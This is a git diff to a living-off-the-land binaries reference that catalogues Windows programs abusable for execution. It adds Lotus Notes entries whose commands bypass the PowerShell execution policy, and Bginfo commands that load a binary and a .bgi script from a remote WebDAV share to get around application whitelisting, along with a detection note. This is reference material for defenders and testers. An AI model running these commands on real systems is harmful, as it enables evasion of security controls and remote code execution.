diff --git a/LOLBins.md b/LOLBins.md index 8d5b4dd..a846291 100644 --- a/LOLBins.md +++ b/LOLBins.md @@ -92,6 +92,8 @@ If you are missing from the acknowledgement, please let me know (I did not forge # OTHER NON MICROSOFT BINARIES [Gpup.exe](OtherBinaries/Gpup.md) +[Nlnotes.exe](OtherBinaries/Nlnotes.md) +[Notes.exe](OtherBinaries/Notes.md) [Nvuhda6.exe](OtherBinaries/Nvuhda6.md) [Nvudisp.exe](OtherBinaries/Nvudisp.md) [VBoxDrvInst.exe](OtherBinaries/VBoxDrvInst.md) diff --git a/OSLibraries/Syssetup.md b/OSLibraries/Syssetup.md index 8fa59dc..e030e5e 100644 --- a/OSLibraries/Syssetup.md +++ b/OSLibraries/Syssetup.md @@ -8,12 +8,14 @@ rundll32 syssetup,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\calc.IN Acknowledgements: * Pierre-Alexandre Braeken - @pabraeken +* Matt harr0ey - @harr0ey Code sample: * Resources: * https://twitter.com/pabraeken/status/994392481927258113 +* https://twitter.com/harr0ey/status/975350238184697857 Full path: ``` diff --git a/OtherBinaries/Nlnotes.md b/OtherBinaries/Nlnotes.md new file mode 100644 index 0000000..dcd76fd --- /dev/null +++ b/OtherBinaries/Nlnotes.md @@ -0,0 +1,31 @@ +## Nlnotes.exe + +* Functions: Execute + +``` +NLNOTES.EXE /authenticate "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass } +``` + +Acknowledgements: +* Daniel Bohannon - @danielhbohannon + +Code sample: +* + +Resources: +* https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f +* https://twitter.com/HanseSecure/status/995578436059127808 + + +Full path: +``` +? +``` + +Notes: +Used by Lotus Notes + + +Detection: + + diff --git a/OtherBinaries/Notes.md b/OtherBinaries/Notes.md new file mode 100644 index 0000000..c95a81f --- /dev/null +++ b/OtherBinaries/Notes.md @@ -0,0 +1,31 @@ +## Notes.exe + +* Functions: Execute + +``` +Notes.exe" "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass } +``` + +Acknowledgements: +* Daniel Bohannon - @danielhbohannon + +Code sample: +* + +Resources: +* https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f +* https://twitter.com/HanseSecure/status/995578436059127808 + + +Full path: +``` +C:\Program Files (x86)\IBM\Lotus\Notes\notes.exe +``` + +Notes: +Used by Lotus Notes + + +Detection: + + diff --git a/OtherMSBinaries/Bginfo.md b/OtherMSBinaries/Bginfo.md index ae9210d..a4399f3 100644 --- a/OtherMSBinaries/Bginfo.md +++ b/OtherMSBinaries/Bginfo.md @@ -3,11 +3,35 @@ * Functions: Execute ``` -bginfo.exe bginfo.bgi /popup /nolicprompt -(Add vbs code inside .bgi file) +bginfo.exe bginfo.bgi /popup /nolicprompt + +"\\10.10.10.10\webdav\bginfo.exe" bginfo.bgi /popup /nolicprompt + +"\\live.sysinternals.com\Tools\bginfo.exe" \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt ``` Acknowledgements: * Oddvar Moe - @oddvarmoe - - \ No newline at end of file + +Code sample: +* https://github.com/api0cradle/BGInfo/blob/master/BGITool_1.0.ps1 + +Resources: +* https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/ +* https://oddvar.moe/2017/05/22/clarification-bginfo-4-22-applocker-still-vulnerable/ +* https://twitter.com/Oddvarmoe/status/865330067630694400 +* https://twitter.com/ItsReallyNick/status/996133093613424641 +* https://github.com/3gstudent/bgi-creater +* https://pentestlab.blog/2017/06/05/applocker-bypass-bginfo/ + +Full path: +``` +No fixed path +``` + +Notes: +Used to set background image in Windows with details about the environment + + +Detection: +Bginfo.exe requesting files externally or running VBS scripts. diff --git a/README.md b/README.md index a45c23b..3d0a136 100644 --- a/README.md +++ b/README.md @@ -34,7 +34,7 @@ Also, please be patient if it takes some time for your contribution to be added Every binary, script and library has it's own .md file in the subfolders. That way I should be easier to maintain and reuse. I have borrowed examples from the community (And a lot from Red Canary - Atomic Red Team - Thanks @subtee) Would really love if the community could contribute as much as possible. That would make it better for everyone. -If you think it is hard to make a pull request using github, don't hasitate to send me a tweet and I will add the contribution for you. +If you think it is hard to make a pull request using github, don't hesitate to send me a tweet and I will add the contribution for you. ## STORY @@ -78,4 +78,4 @@ Love this logo: - [ ] Map it to the Mitre Att&ck <3 - [ ] LOLGuiBins - [ ] More list based on classifications -- [ ] LOLBAS lists for Linux? OSX? \ No newline at end of file +- [ ] LOLBAS lists for Linux? OSX?